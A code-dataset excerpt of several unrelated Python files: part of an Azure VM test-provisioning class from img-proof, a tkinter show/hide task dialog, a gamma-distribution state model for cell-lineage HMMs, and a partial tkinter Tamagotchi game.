self.vnet_resource_group = (\n self.custom_args.get('vnet_resource_group')\n or self.ipa_config['vnet_resource_group']\n )\n\n subnet_args = [\n self.subnet_id, self.vnet_name, self.vnet_resource_group\n ]\n if any(subnet_args) and not all(subnet_args):\n raise AzureCloudException(\n 'subnet_id, vnet_resource_group and vnet_name'\n ' are all required to use an existing subnet.'\n )\n\n if not self.region:\n raise AzureCloudException(\n 'Region is required to connect to Azure.'\n )\n\n self.service_account_file = (\n self.custom_args.get('service_account_file')\n or self.ipa_config['service_account_file']\n )\n if not self.service_account_file:\n raise AzureCloudException(\n 'Service account file is required to connect to Azure.'\n )\n else:\n self.service_account_file = os.path.expanduser(\n self.service_account_file\n )\n\n if not self.ssh_private_key_file:\n raise AzureCloudException(\n 'SSH private key file is required to connect to instance.'\n )\n\n self.accelerated_networking = (\n self.custom_args.get('accelerated_networking')\n or self.ipa_config['accelerated_networking']\n )\n self.ssh_user = self.ssh_user or AZURE_DEFAULT_USER\n self.ssh_public_key = self._get_ssh_public_key()\n\n self.gallery_name = self.custom_args.get('gallery_name')\n self.gallery_resource_group = self.custom_args.get(\n 'gallery_resource_group'\n )\n self.image_version = self.custom_args.get('image_version')\n\n gallery_args = [\n self.gallery_name,\n self.gallery_resource_group,\n self.image_version\n ]\n if any(gallery_args) and not all(gallery_args):\n raise AzureCloudException(\n 'gallery_name, gallery_resource_group and image_version'\n ' are all required to use a gallery image.'\n )\n\n self.compute = self._get_management_client(ComputeManagementClient)\n self.network = self._get_management_client(\n NetworkManagementClient,\n wrap_creds=False\n )\n self.resource = self._get_management_client(ResourceManagementClient)\n\n if self.running_instance_id:\n self._set_default_resource_names()\n\n self.image_publisher = None\n self.image_offer = None\n self.image_sku = None\n\n def _create_network_interface(\n self, ip_config_name, nic_name, public_ip, region,\n resource_group_name, subnet, accelerated_networking=False\n ):\n \"\"\"\n Create a network interface in the resource group.\n\n Attach NIC to the subnet and public IP provided.\n \"\"\"\n nic_config = {\n 'location': region,\n 'ip_configurations': [{\n 'name': ip_config_name,\n 'private_ip_allocation_method': 'Dynamic',\n 'subnet': {\n 'id': subnet.id\n },\n 'public_ip_address': {\n 'id': public_ip.id\n },\n }]\n }\n\n if accelerated_networking:\n nic_config['enable_accelerated_networking'] = True\n\n try:\n nic_setup = self.network.network_interfaces.begin_create_or_update(\n resource_group_name, nic_name, nic_config\n )\n except Exception as error:\n raise AzureCloudException(\n 'Unable to create network interface: {0}.'.format(\n error\n )\n )\n\n return nic_setup.result()\n\n def _create_public_ip(self, public_ip_name, resource_group_name, region):\n \"\"\"\n Create dynamic public IP address in the resource group.\n \"\"\"\n public_ip_config = {\n 'location': region,\n 'public_ip_allocation_method': 'Dynamic'\n }\n\n try:\n public_ip_setup = \\\n self.network.public_ip_addresses.begin_create_or_update(\n resource_group_name, public_ip_name, public_ip_config\n )\n except Exception as error:\n raise AzureCloudException(\n 'Unable to create public IP: {0}.'.format(error)\n )\n\n return public_ip_setup.result()\n\n def _create_resource_group(self, region, resource_group_name):\n \"\"\"\n Create resource group if it does not exist.\n \"\"\"\n resource_group_config = {'location': region}\n\n try:\n self.resource.resource_groups.create_or_update(\n resource_group_name, resource_group_config\n )\n except Exception as error:\n raise AzureCloudException(\n 'Unable to create resource group: {0}.'.format(error)\n )\n\n def _create_storage_profile(self):\n \"\"\"\n Create the storage profile for the instance.\n\n Image reference can be a custom image name or a published urn.\n \"\"\"\n if self.image_publisher:\n storage_profile = {\n 'image_reference': {\n 'publisher': self.image_publisher,\n 'offer': self.image_offer,\n 'sku': self.image_sku,\n 'version': self.image_version\n },\n 'os_disk': {\n 'disk_size_gb': self.root_disk_size,\n 'create_option': 'FromImage'\n }\n }\n elif self.gallery_name:\n try:\n image = self.compute.gallery_image_versions.get(\n self.gallery_resource_group,\n self.gallery_name,\n self.image_id,\n self.image_version\n )\n image_id = image.id\n except Exception:\n raise AzureCloudException(\n 'Image with name: {0} and version: {1} '\n 'not found in gallery: {2} with resource group: '\n '{3}.'.format(\n self.image_id,\n self.image_version,\n self.gallery_name,\n self.gallery_resource_group\n )\n )\n\n storage_profile = {\n 'image_reference': {\n 'id': image_id\n }\n }\n else:\n for image in self.compute.images.list():\n if image.name == self.image_id:\n image_id = image.id\n break\n else:\n raise AzureCloudException(\n 'Image with name {0} not found.'.format(self.image_id)\n )\n\n storage_profile = {\n 'image_reference': {\n 'id': image_id\n }\n }\n\n return storage_profile\n\n def _create_subnet(self, resource_group_name, subnet_id, vnet_name):\n \"\"\"\n Create a subnet in the provided vnet and resource group.\n \"\"\"\n subnet_config = {'address_prefix': '10.0.0.0/29'}\n\n try:\n subnet_setup = self.network.subnets.begin_create_or_update(\n resource_group_name, vnet_name, subnet_id, subnet_config\n )\n except Exception as error:\n raise AzureCloudException(\n 'Unable to create subnet: {0}.'.format(error)\n )\n\n return subnet_setup.result()\n\n def _create_virtual_network(self, region, resource_group_name, vnet_name):\n \"\"\"\n Create a vnet in the given resource group with default address space.\n \"\"\"\n vnet_config = {\n 'location': region,\n 'address_space': {\n 'address_prefixes': ['10.0.0.0/27']\n }\n }\n\n try:\n vnet_setup = self.network.virtual_networks.begin_create_or_update(\n resource_group_name, vnet_name, vnet_config\n )\n except Exception as error:\n raise AzureCloudException(\n 'Unable to create vnet: {0}.'.format(error)\n )\n\n vnet_setup.result()\n\n def _create_vm(self, vm_config):\n \"\"\"\n Attempt to create or update VM instance based on vm_parameters config.\n \"\"\"\n try:\n vm_setup = self.compute.virtual_machines.begin_create_or_update(\n self.running_instance_id, self.running_instance_id,\n vm_config\n )\n except Exception as error:\n raise AzureCloudException(\n 'An exception occurred creating virtual machine: {0}'.format(\n error\n )\n )\n\n vm_setup.result()\n\n def _create_vm_config(self, interface):\n \"\"\"\n Create the VM config dictionary.\n\n Requires an existing network interface object.\n \"\"\"\n # Split image ID into it's components.\n self._process_image_id()\n\n hardware_profile = {\n 'vm_size': self.instance_type or AZURE_DEFAULT_TYPE\n }\n\n network_profile = {\n 'network_interfaces': [{\n 'id': interface.id,\n 'primary': True\n }]\n }\n\n storage_profile = self._create_storage_profile()\n\n os_profile = {\n 'computer_name': self.running_instance_id,\n 'admin_username': self.ssh_user,\n 'linux_configuration': {\n 'disable_password_authentication': True,\n 'ssh': {\n 'public_keys': [{\n 'path': '/home/{0}/.ssh/authorized_keys'.format(\n self.ssh_user\n ),\n 'key_data': self.ssh_public_key\n }]\n }\n }\n }\n\n vm_config = {\n 'location': self.region,\n 'os_profile': os_profile,\n 'hardware_profile': hardware_profile,\n 'storage_profile': storage_profile,\n 'network_profile': network_profile\n }\n\n return vm_config\n\n def _get_instance(self):\n \"\"\"\n Return the instance matching the running_instance_id.\n \"\"\"\n try:\n instance = self.compute.virtual_machines.get(\n self.running_instance_id, self.running_instance_id,\n expand='instanceView'\n )\n except Exception as error:\n raise AzureCloudException(\n 'Unable to retrieve instance: {0}'.format(error)\n )\n\n return instance\n\n def _get_instance_state(self):\n \"\"\"\n Retrieve state of instance.\n \"\"\"\n instance = self._get_instance()\n statuses = instance.instance_view.statuses\n\n for status in statuses:\n if status.code.startswith('PowerState'):\n return status.display_status\n\n def _get_client_from_json(self, client, credentials, wrap_creds=True):\n credential = self._get_secret_credential(credentials)\n\n if wrap_creds:\n credential = CredentialWrapper(credential)\n\n return client(\n credential,\n credentials['subscriptionId']\n )\n\n @staticmethod\n def _get_secret_credential(credentials):\n return ClientSecretCredential(\n tenant_id=credentials['tenantId'],\n client_id=credentials['clientId'],\n client_secret=credentials['clientSecret']\n )\n\n def _get_management_client(self, client_class, wrap_creds=True):\n \"\"\"\n Return instance of resource management client.\n \"\"\"\n credentials = ipa_utils.load_json(self.service_account_file)\n\n try:\n client = self._get_client_from_json(\n client_class,\n credentials,\n wrap_creds=wrap_creds\n )\n except ValueError as error:\n raise AzureCloudException(\n 'Service account file format is invalid: {0}.'.format(error)\n )\n except KeyError as error:\n raise AzureCloudException(\n 'Service account file missing key: {0}.'.format(error)\n )\n except Exception as error:\n raise AzureCloudException(\n 'Unable to create resource management client: '\n '{0}.'.format(error)\n )\n\n return client\n\n def _get_ssh_public_key(self):\n \"\"\"\n Generate SSH public key from private key.\n \"\"\"\n key = ipa_utils.get_public_ssh_key(self.ssh_private_key_file)\n return key.decode()\n\n def _is_instance_running(self):\n \"\"\"\n Return True if instance is in running state.\n \"\"\"\n return self._get_instance_state() == 'VM running'\n\n def _launch_instance(self):\n \"\"\"\n Create new test instance in a resource group with the same name.\n \"\"\"\n self.running_instance_id = self._generate_instance_name()\n self.logger.debug('ID of instance: %s' % self.running_instance_id)\n self._set_default_resource_names()\n\n try:\n # Try block acts as a transaction. If an exception is raised\n # attempt to cleanup the resource group and all created resources.\n\n # Create resource group.\n self._create_resource_group(self.region, self.running_instance_id)\n\n if self.subnet_id:\n # Use existing vnet/subnet.\n subnet = self.network.subnets.get(\n self.vnet_resource_group, self.vnet_name, self.subnet_id\n )\n else:\n self.subnet_id = ''.join([self.running_instance_id, '-subnet'])\n self.vnet_name = ''.join([self.running_instance_id, '-vnet'])\n\n # Create new vnet\n self._create_virtual_network(\n self.region, self.running_instance_id, self.vnet_name\n )\n\n # Create new subnet in new vnet\n subnet = self._create_subnet(\n self.running_instance_id, self.subnet_id, self.vnet_name\n )\n\n # Setup interface and public ip in resource group.\n public_ip = self._create_public_ip(\n self.public_ip_name, self.running_instance_id, self.region\n )\n interface = self._create_network_interface(\n self.ip_config_name, self.nic_name, public_ip, self.region,\n self.running_instance_id, subnet, self.accelerated_networking\n )\n\n # Get dictionary of VM parameters and create instance.\n vm_config = self._create_vm_config(interface)\n self._create_vm(vm_config)\n except Exception:\n try:\n self._terminate_instance()\n except Exception:\n pass\n raise\n else:\n # Ensure VM is in the running state.\n self._wait_on_instance('VM running', timeout=self.timeout)\n\n def _process_image_id(self):\n \"\"\"\n Split image id into component values.\n\n Example: SUSE:SLES:12-SP3:2018.01.04\n Publisher:Offer:Sku:Version\n\n Raises:\n If image_id is not a valid format.\n \"\"\"\n image_info = self.image_id.strip().split(':')\n\n if len(image_info) == 4:\n # Split out image attrs if in URN format\n self.image_publisher = image_info[0]\n self.image_offer = image_info[1]\n self.image_sku = image_info[2]\n self.image_version = image_info[3]\n\n def _set_default_resource_names(self):\n \"\"\"\n Generate names for resources based on the running_instance_id.\n \"\"\"\n self.ip_config_name = ''.join([\n self.running_instance_id, '-ip-config'\n ])\n self.nic_name = ''.join([self.running_instance_id, '-nic'])\n self.public_ip_name = ''.join([self.running_instance_id, '-public-ip'])\n\n def _set_image_id(self):\n \"\"\"\n If an existing instance is used get image id from deployment.\n \"\"\"\n instance = self._get_instance()\n image_info = instance.storage_profile.image_reference\n\n if image_info.publisher:\n self.image_id = ':'.join([\n image_info.publisher, image_info.offer,\n image_info.sku, image_info.version\n ])\n else:\n if 'galleries' in image_info.id:\n # /subscriptions/{id}/resourceGroups/{rg_name}\n # /providers/Microsoft.Compute/galleries/{gallery_name}\n # /images/{image_definition_name}/versions/{version}\n data = image_info.id.split('/')\n self.image_version = data[-1]\n self.image_id = data[-3]\n self.gallery_name = data[-5]\n self.gallery_resource_group = data[-9]\n else:\n self.image_id = image_info.id.rsplit('/', maxsplit=1)[1]\n\n def _set_instance_ip(self):\n \"\"\"\n Get the IP address based on instance ID.\n\n If public IP address not found attempt to get private IP.\n \"\"\"\n try:\n ip_address = self.network.public_ip_addresses.get(\n self.running_instance_id, self.public_ip_name\n ).ip_address\n except Exception:\n try:\n ip_address = self.network.network_interfaces.get(\n self.running_instance_id, self.nic_name\n ).ip_configurations[0].private_ip_address\n except Exception as error:\n raise AzureCloudException(\n 'Unable to retrieve instance IP address: {0}.'.format(\n error\n )\n )\n\n self.instance_ip = ip_address\n\n def _start_instance(self):\n \"\"\"\n Start the instance.\n \"\"\"\n try:\n vm_start = self.compute.virtual_machines.begin_start(\n self.running_instance_id, self.running_instance_id\n )\n except Exception as error:\n raise AzureCloudException(\n 'Unable to start instance: {0}.'.format(error)\n )\n\n vm_start.result()\n\n def _stop_instance(self):\n \"\"\"\n Stop the instance.\n \"\"\"\n try:\n vm_stop = self.compute.virtual_machines.begin_power_off(\n self.running_instance_id, self.running_instance_id\n )\n except Exception as error:\n raise AzureCloudException(\n 'Unable to stop instance: {0}.'.format(error)\n )\n\n vm_stop.result()\n\n def _terminate_instance(self):\n \"\"\"\n Terminate the resource group and instance.\n \"\"\"\n try:\n if hasattr(self.resource.resource_groups, 'delete'):\n self.resource.resource_groups.delete(\n self.running_instance_id\n )\n else:\n self.resource.resource_groups.begin_delete(\n self.running_instance_id\n )\n except Exception as error:\n raise AzureCloudException(\n 'Unable to terminate resource group: {0}.'.format(error)\n )\n\n def get_console_log(self):\n \"\"\"\n Return console log output if it is available.\n\n Currently there is no way to get console log from API.\n \"\"\"\n return ''\n","repo_name":"SUSE-Enceladus/img-proof","sub_path":"img_proof/ipa_azure.py","file_name":"ipa_azure.py","file_ext":"py","file_size_in_byte":20561,"program_lang":"python","lang":"en","doc_type":"code","stars":14,"dataset":"github-code","pt":"53"} +{"seq_id":"14947672273","text":"# *-* coding:utf-8 *-*\nfrom tkinter import *\nfrom tkinter.ttk import *\nfrom tkinter import Frame, Label\n\nfrom util.widgets.Dialog import *\n\nfrom .AfficherMasquerClass import *\n\ndef askAfficherMasquer(periodManager):\n \"\"\"\n Dialogue qui permet de gérer la visibilitée des schedulables\n @param periodManager : celui de l'app\n @return masquage : True si au moins une tache n'est pas visible\n \"\"\"\n masquage = False\n def onClose(b):\n nonlocal masquage\n if b == \"Ok\":\n masquage = gestion.onClose(b)\n fen.destroy()\n\n fen = Dialog(title = \"Afficher ou masquer des taches\", buttons = (\"Ok\", \"Annuler\"), command = onClose)\n gestion = AfficherMasquer(fen, periodManager)\n gestion.pack(fill = BOTH, expand = YES)\n\n fen.activateandwait()\n return masquage\n\n","repo_name":"Zetrypio/TaskManager","sub_path":"TaskManager/toolbar/dialog/askAfficherMasquerDialog.py","file_name":"askAfficherMasquerDialog.py","file_ext":"py","file_size_in_byte":835,"program_lang":"python","lang":"fr","doc_type":"code","stars":2,"dataset":"github-code","pt":"53"} +{"seq_id":"354153335","text":"\"\"\" This file is completely user defined. We have provided a general starting point for the user to use as an example. \"\"\"\nimport numpy as np\nimport scipy.stats as sp\nfrom typing import Union\n\nfrom .stateCommon import gamma_estimator, basic_censor, bern_estimator\nfrom ..CellVar import Time, CellVar\n\n\nclass StateDistribution:\n \"\"\"\n StateDistribution for cells with gamma distributed times.\n \"\"\"\n\n def __init__(self, bern_p=0.9, gamma_a=7, gamma_scale=4.5):\n \"\"\"Initialization function should take in just in the parameters\n for the observations that comprise the multivariate random variable emission they expect their data to have.\n In this case, we used Gamma distribution for cell lifetime, which has 2 parameters; shape and scale.\n And we used bernoulli distribution for cell lifetime, which has 1 parameter.\n \"\"\"\n self.params = np.array([bern_p, gamma_a, gamma_scale])\n\n def rvs(\n self, size: int, rng=None\n ): # user has to identify what the multivariate (or univariate) random variable looks like\n \"\"\"User-defined way of calculating a random variable given the parameters of the state stored in their object.\"\"\"\n # {\n rng = np.random.default_rng(rng)\n bern_obs = rng.binomial(\n 1, p=self.params[0], size=size\n ) # bernoulli observations\n gamma_obs = rng.gamma(\n self.params[1], scale=self.params[2], size=size\n ) # gamma observations\n gamma_obs_censor = [1] * size # 1 if observed\n\n # } is user-defined in that they have to define and maintain the order of the multivariate random variables.\n # These tuples of observations will go into the cells in the lineage tree.\n return bern_obs, gamma_obs, gamma_obs_censor\n\n def dist(self, other) -> float:\n \"\"\"Calculate the Wasserstein distance between two gamma distributions that each correspond to a state.\n This is our way of calculating the distance between two state, when their bernoulli distribution is kept the same.\n For more information about wasserstein distance, please see https://en.wikipedia.org/wiki/Wasserstein_metric.\n \"\"\"\n assert isinstance(self, type(other))\n dist = np.absolute(\n self.params[1] * self.params[2] - other.params[1] * other.params[2]\n )\n return dist\n\n def dof(self) -> int:\n \"\"\"Return the degrees of freedom.\n In this case, each state has 1 bernoulli distribution parameter, and 2 gamma distribution parameters.\n \"\"\"\n return 3\n\n def logpdf(self, x: np.ndarray) -> np.ndarray:\n \"\"\"User-defined way of calculating the log likelihood of the observation stored in a cell.\n In the case of a univariate observation, the user still has to define how the likelihood is calculated,\n but has the ability to just return the output of a known scipy.stats..<{pdf,pmf}> function.\n In the case of a multivariate observation, the user has to decide how the likelihood is calculated.\n In our example, we assume the observation's are uncorrelated across the dimensions (across the different\n distribution observations), so the total log likelihood of observing the multivariate observation is just the sum of\n the individual observation log likelihoods.\n \"\"\"\n ll = np.zeros(x.shape[0])\n\n # Update uncensored Gamma\n ll[x[:, 2] == 1] += sp.gamma.logpdf(\n x[x[:, 2] == 1, 1], a=self.params[1], scale=self.params[2]\n )\n\n # Update censored Gamma\n ll[x[:, 2] == 0] += sp.gamma.logsf(\n x[x[:, 2] == 0, 1], a=self.params[1], scale=self.params[2]\n )\n\n # Remove dead cells\n ll[x[:, 0] == 0] = 0.0\n\n # Update for observed Bernoulli\n ll[np.isfinite(x[:, 0])] += sp.bernoulli.logpmf(\n x[np.isfinite(x[:, 0]), 0], self.params[0]\n )\n\n # Log likelihood of negative values should be zero\n ll[x[:, 1] < 0] = 0.0\n ll[x[:, 0] < 0] = 0.0\n\n return ll\n\n def estimator(self, X: list, gammas: np.ndarray):\n \"\"\"User-defined way of estimating the parameters given a list of the tuples of observations from a group of cells.\"\"\"\n\n # getting the observations as individual lists\n # {\n x = np.array(X)\n bern_obs = x[:, 0]\n γ_obs = x[:, 1]\n gamma_obs_censor = x[:, 2]\n\n # remove negative observations from fitting\n bern_obs_ = bern_obs[γ_obs >= 0]\n γ_obs_ = γ_obs[γ_obs >= 0]\n gamma_obs_censor_ = gamma_obs_censor[γ_obs >= 0]\n gammas_ = gammas[γ_obs >= 0]\n\n # Both unoberved and dead cells should be removed from gamma\n g_mask = np.logical_and(np.isfinite(γ_obs_), bern_obs_.astype(\"bool\"))\n assert (\n np.sum(g_mask) > 0\n ), f\"All the cells are eliminated from the Gamma estimator.\"\n\n self.params[0] = bern_estimator(bern_obs, gammas)\n self.params[1], self.params[2] = gamma_estimator(\n [γ_obs_[g_mask]],\n [gamma_obs_censor_[g_mask]],\n [gammas_[g_mask]],\n self.params[1:3],\n phase=\"all\",\n )\n\n # } requires the user's attention.\n # Note that we return an instance of the state distribution class, but now instantiated with the parameters\n # from estimation. This is then stored in the original state distribution object which then gets updated\n # if this function runs again.\n\n def assign_times(self, full_lineage: list[CellVar]):\n \"\"\"\n Assigns the start and end time for each cell in the lineage.\n The time observation will be stored in the cell's observation parameter list\n in the second position (index 1). See the other time functions to understand.\n This is used in the creation of LineageTrees.\n \"\"\"\n # traversing the cells by generation\n for cell in full_lineage:\n if cell.isRootParent():\n cell.time = Time(0, cell.obs[1])\n else:\n cell.time = Time(\n cell.parent.time.endT, cell.parent.time.endT + cell.obs[1]\n )\n\n def censor_lineage(\n self,\n censor_condition: int,\n full_lineage: list[CellVar],\n desired_experiment_time=2e12,\n ):\n \"\"\"\n This function removes those cells that are intended to be removed.\n These cells include the descendants of a cell that has died, or has lived beyonf the experimental end time.\n It takes in LineageTree object, walks through all the cells in the output binary tree,\n applies the censorship to each cell that is supposed to be removed,\n and returns the lineage of cells that are supposed to be alive and accounted for.\n \"\"\"\n if censor_condition == 0:\n return full_lineage\n\n for cell in full_lineage:\n basic_censor(cell)\n\n if censor_condition in (1, 3):\n fate_censor(cell)\n\n if censor_condition in (2, 3):\n time_censor(cell, desired_experiment_time)\n\n return [c for c in full_lineage if c.observed]\n\n\ndef fate_censor(cell):\n \"\"\"\n Checks whether a cell has died based on its fate, and if so, it will remove its subtree.\n Our example is based on the standard requirement that the first observation\n (index 0) is a measure of the cell's fate (1 being alive, 0 being dead).\n \"\"\"\n if cell.obs[0] == 0:\n if not cell.isLeafBecauseTerminal():\n cell.left.observed = False\n cell.right.observed = False\n\n\ndef time_censor(cell, desired_experiment_time: Union[int, float]):\n \"\"\"\n Checks whether a cell has lived beyond the experiment end time and if so, it will remove its subtree.\n Our example is based on the standard requirement that the second observation\n (index 1) is a measure of the cell's lifetime.\n \"\"\"\n if cell.time.endT > desired_experiment_time:\n cell.time.endT = desired_experiment_time\n cell.obs[0] = float(\"nan\")\n cell.obs[1] = desired_experiment_time - cell.time.startT\n cell.obs[2] = 0 # censored\n if not cell.isLeafBecauseTerminal():\n # the daughters are no longer observed\n cell.left.observed = False\n cell.right.observed = False\n\n\ndef atonce_estimator(\n all_tHMMobj: list, x_list: list, gammas_list: list, phase: str, state_j: int\n):\n \"\"\"Estimating the parameters for one state, in this case bernoulli nad gamma distirbution parameters,\n given a list of the tuples of observations from a group of cells.\n gammas_list is only for one state.\"\"\"\n # unzipping the list of tuples\n x_data = [np.array(x) for x in x_list]\n\n # getting the observations as individual lists\n bern_obs = [x[:, 0] for x in x_data]\n γ_obs = [x[:, 1] for x in x_data]\n gamma_obs_censor = [x[:, 2] for x in x_data]\n\n # remove negative observations from being used for fitting\n bern_obs_ = [b[γ_obs[i] >= 0] for i, b in enumerate(bern_obs)]\n γ_obs_ = [g[g >= 0] for i, g in enumerate(γ_obs)]\n gamma_obs_censor_ = [gc[γ_obs[i] >= 0] for i, gc in enumerate(gamma_obs_censor)]\n gammas_list_ = [gc[γ_obs[i] >= 0] for i, gc in enumerate(gammas_list)]\n\n for i, item in enumerate(bern_obs_):\n assert item.shape == γ_obs_[i].shape == gamma_obs_censor_[i].shape\n\n bern_params = [\n bern_estimator(bern_obs_[i], gammas_list_[i]) for i in range(len(gammas_list_))\n ]\n\n # Both unoberved and dead cells should be removed from gamma\n g_masks = [\n np.logical_and(np.isfinite(γ_o), berns.astype(\"bool\"))\n for γ_o, berns in zip(γ_obs_, bern_obs_)\n ]\n for g_mask in g_masks:\n assert (\n np.sum(g_mask) > 0\n ), f\"All the cells are eliminated from the Gamma estimator.\"\n\n γ_obs_total = [g_obs[g_masks[i]] for i, g_obs in enumerate(γ_obs_)]\n γ_obs_total_censored = [\n g_obs_cen[g_masks[i]] for i, g_obs_cen in enumerate(gamma_obs_censor_)\n ]\n gammas_total = [\n np.vstack(gamma_tot)[g_masks[i]] for i, gamma_tot in enumerate(gammas_list_)\n ]\n gammas_total = [np.squeeze(g) for g in gammas_total]\n\n if phase == \"G1\":\n x0 = np.array(\n [all_tHMMobj[0].estimate.E[state_j].params[2]]\n + [tHMMobj.estimate.E[state_j].params[3] for tHMMobj in all_tHMMobj]\n )\n output = gamma_estimator(\n γ_obs_total, γ_obs_total_censored, gammas_total, x0, phase=phase\n )\n for i, tHMMobj in enumerate(all_tHMMobj):\n tHMMobj.estimate.E[state_j].params[0] = bern_params[i]\n tHMMobj.estimate.E[state_j].G1.params[0] = bern_params[i]\n tHMMobj.estimate.E[state_j].params[2] = output[0]\n tHMMobj.estimate.E[state_j].G1.params[1] = output[0]\n tHMMobj.estimate.E[state_j].params[3] = output[i + 1]\n tHMMobj.estimate.E[state_j].G1.params[2] = output[i + 1]\n\n elif phase == \"G2\":\n x0 = np.array(\n [all_tHMMobj[0].estimate.E[state_j].params[4]]\n + [tHMMobj.estimate.E[state_j].params[5] for tHMMobj in all_tHMMobj]\n )\n output = gamma_estimator(\n γ_obs_total, γ_obs_total_censored, gammas_total, x0, phase=phase\n )\n for i, tHMMobj in enumerate(all_tHMMobj):\n tHMMobj.estimate.E[state_j].params[1] = bern_params[i]\n tHMMobj.estimate.E[state_j].G2.params[0] = bern_params[i]\n tHMMobj.estimate.E[state_j].params[4] = output[0]\n tHMMobj.estimate.E[state_j].G2.params[1] = output[0]\n tHMMobj.estimate.E[state_j].params[5] = output[i + 1]\n tHMMobj.estimate.E[state_j].G2.params[2] = output[i + 1]\n\n elif phase == \"all\":\n x0 = np.array(\n [all_tHMMobj[0].estimate.E[state_j].params[1]]\n + [tHMMobj.estimate.E[state_j].params[2] for tHMMobj in all_tHMMobj]\n )\n output = gamma_estimator(\n γ_obs_total, γ_obs_total_censored, gammas_total, x0, phase=phase\n )\n for i, tHMMobj in enumerate(all_tHMMobj):\n tHMMobj.estimate.E[state_j].params[0] = bern_params[i]\n tHMMobj.estimate.E[state_j].params[1] = output[0]\n tHMMobj.estimate.E[state_j].params[2] = output[i + 1]\n","repo_name":"meyer-lab/tHMM","sub_path":"lineage/states/StateDistributionGamma.py","file_name":"StateDistributionGamma.py","file_ext":"py","file_size_in_byte":12376,"program_lang":"python","lang":"en","doc_type":"code","stars":8,"dataset":"github-code","pt":"53"} +{"seq_id":"35084872394","text":"import tkinter as tk\n\nclass Tamagotchi:\n name = \"\"\n state = 0 #ESTADO DEL TAMAGOTCHI\n\ndef startGame():\n print(\"Iniciando el juego\")\n tamagotchi.state = 0\n etiquetaEstado.configure(text=(\"Estado: {0}\".format(estados[tamagotchi.state])))\n actualizarCuadricula(15,10)\n\ndef accion(numeroAccion):\n print(\"Acción {0}\".format(numeroAccion))\n tamagotchi.state = maquina[tamagotchi.state][numeroAccion]\n etiquetaEstado.configure(text=(\"Estado: {0}\".format(estados[tamagotchi.state])))\n actualizarCuadricula(15,10)\n #cuadricula = nuevaCuadricula(15, 10, 170, 70)\n\ndef actualizarCuadricula(numeroX, numeroY):\n #print(cuadricula)\n for y in range(numeroY):\n for x in range(numeroX):\n if personaje[y][x] != 9:\n colorTemporal = tamagotchi.state\n else :\n colorTemporal = 9\n cuadricula[y][x].configure(bg=colores[colorTemporal])\n\n\n\ndef nuevaCuadricula(numeroX, numeroY, posX, posY):\n\n posX = posX\n posY = posY\n\n cuadricula = []\n\n for y in range(numeroY):\n fila = []\n for x in range(numeroX):\n if personaje[y][x] != 9:\n colorTemporal = tamagotchi.state\n else :\n colorTemporal = 9\n temporal = tk.Label(root, text=\"\", width=2, heigh=1, bg=colores[colorTemporal])\n temporal.place(x=(posX + x*25), y=(posY + y*25))\n fila.append(temporal)\n cuadricula.append(fila)\n\n\n return cuadricula\n\n\n\nheigh = 500\nwidth = 700\n\ncolores = [\"#ffffff\", \"#f5b5c8\", \"#c92d39\", \"#ef8d22\", \"#ffdf71\", \"#5abaa7\", \"#3aa6dd\", \"#834187\", \"#999\",\"#000\", ]\nestados = [\"Recién Nacido\", \"Cariñoso\", \"Enojado\", \"Nervioso\", \"Asustado\", \"Feliz\", \"Tranquilo\", \"Enfermo\", \"Triste\",\"Muerto\", ]\n\n#[0] - ALIMENTAR\n#[1] - ACARICIAR\n#[2] - GOLPEAR\n#[3] - JUGAR\n#[4] - CASTIGAR\n#[5] - ASUSTAR\n#[6] - PASEAR\n#[7] - BAÑAR\n#[8] - INYECTAR\n#[9] - MATAR\n\nmaquina = [\n [5, 1, 4, 5, 8, 4, 5, 5, 7, 9], #[0]RECIEN NACIDO\n [5, 1, 4, 1, 8, 3, 5, 6, 7, 9], #[1]CARIÑOSO\n [7, 6, 7, 3, 7, 7, 6, 6, 7, 9], #[2]ENOJADO\n [2, 6, 2, 6, 4, 4, 6, 6, 7, 9], #[3]NERVIOSO\n [7, 6, 8, 6, 4, 4, 6, 6, 7, 9], #[4]ASUSTADO\n [5, 1, 8, 5, 3, 3, 5, 6, 7, 9], #[5]FELIZ\n [5, 1, 3, 5, 8, 4, 5, 6, 7, 9], #[6]TRANQUILO\n [7, 7, 9, 7, 9, 9, 7, 3, 6, 9], #[7]ENFERMO\n [6, 5, 9, 6, 9, 3, 5, 6, 7, 9], #[8]TRISTE\n [9, 9, 9, 9, 9, 9, 9, 9, 9, 9], #[9]MUERTO\n ]\n\npersonaje = [\n [9,9,9,9,9,9,9,9,9,9,9,9,9,9,9],\n [9,9,9,9,0,9,9,9,9,9,0,9,9,9,9],\n [9,9,9,9,9,0,9,9,9,0,9,9,9,9,9],\n [9,9,9,9,0,0,0,0,0,0,0,9,9,9,9],\n [9,9,9,0,0,9,0,0,0,9,0,0,9,9,9],\n [9,9,0,0,0,0,0,0,0,0,0,0,0,9,9],\n [9,9,0,9,0,0,0,0,0,0,0,9,0,9,9],\n [9,0,9,9,0,9,9,9,9,9,0,9,9,0,9],\n [9,9,9,9,0,0,9,9,9,0,0,9,9,9,9],\n [9,9,9,9,9,9,9,9,9,9,9,9,9,9,9],\n [9,9,9,9,9,9,9,9,9,9,9,9,9,9,9],\n ]\n\n\nroot = tk.Tk()\nroot.config(width=width, height=heigh, bg='white')\n\nstartButton = tk.Button(root, text=\"Reiniciar el juego\",\n command=lambda: startGame())\nstartButton.place(x=(width/2-45), y=25)\n\n#Nace el tamagochi\nprint(\"Nacimiento de tamagochi\")\ntamagotchi = Tamagotchi()\ntamagotchi.name = \"Jamón\"\ntamagotchi.state = 0 #Estado [0] = Recién nacido\n\n\ncuadricula = nuevaCuadricula(15, 10, 170, 70)\n\n#Botones de acciones\n\netiquetaEstado = tk.Label(root, text=(\"Estado: {0}\".format(estados[tamagotchi.state])), width=20, heigh=1, bg=colores[tamagotchi.state], fg='#000')\netiquetaEstado.place(x=100, y=50)\n\n\naccion1 = tk.Button(root, bg='#000', fg='white', height = 2, width = 10, text=\"ALIMENTAR\",\n command=lambda: accion(0))\naccion1.place(x=135, y=350)\n\naccion2 = tk.Button(root, bg='#000', fg='white', height = 2, width = 10, text=\"ACARICIAR\",\n command=lambda: accion(1))\naccion2.place(x=225, y=350)\n\naccion3 = tk.Button(root, bg='#000', fg='white', height = 2, width = 10, text=\"GOLPEAR\",\n command=lambda: accion(2))\naccion3.place(x=315, y=350)\n\naccion4 = tk.Button(root, bg='#000', fg='white', height = 2, width = 10, text=\"JUGAR\",\n command=lambda: accion(3))\naccion4.place(x=405, y=350)\n\naccion5 = tk.Button(root, bg='#000', fg='white', height = 2, width = 10, text=\"CASTIGAR\",\n command=lambda: accion(4))\naccion5.place(x=495, y=350)\n\naccion6 = 